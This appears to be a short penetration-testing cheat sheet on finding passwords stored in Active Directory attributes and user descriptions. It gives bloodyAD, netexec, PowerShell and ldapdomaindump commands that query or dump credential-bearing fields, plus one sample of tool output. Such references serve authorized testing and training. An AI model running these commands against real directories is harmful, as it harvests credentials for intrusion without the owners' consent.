Skip to content

Password - AD User Comment

There are 3-4 fields that seem to be common in most Active Directory schemas: UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.

  • Windows/Linux command

    bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host get search --filter '(|(userPassword=*)(unixUserPassword=*)(unicodePassword=*)(description=*))' --attr userPassword,unixUserPassword,unicodePwd,description

  • Password in User Description

    netexec ldap domain.lab -u 'username' -p 'password' -M user-desc
    netexec ldap -u 'username' -p 'password' --kdcHost -M get-desc-users
    GET-DESC...       389    dc01    [+] Found following users: 
    GET-DESC...       389    dc01    User: Guest description: Built-in account for guest access to the computer/domain
    GET-DESC...       389    dc01    User: krbtgt description: Key Distribution Center Service Account

  • Get unixUserPassword attribute from all users in ldap

    nxc ldap -u user -p pass -M get-unixUserPassword -M getUserPassword

  • Native Powershell command

    Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID

  • Dump the Active Directory and grep the content.

    ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd -o ~/Documents/AD_DUMP/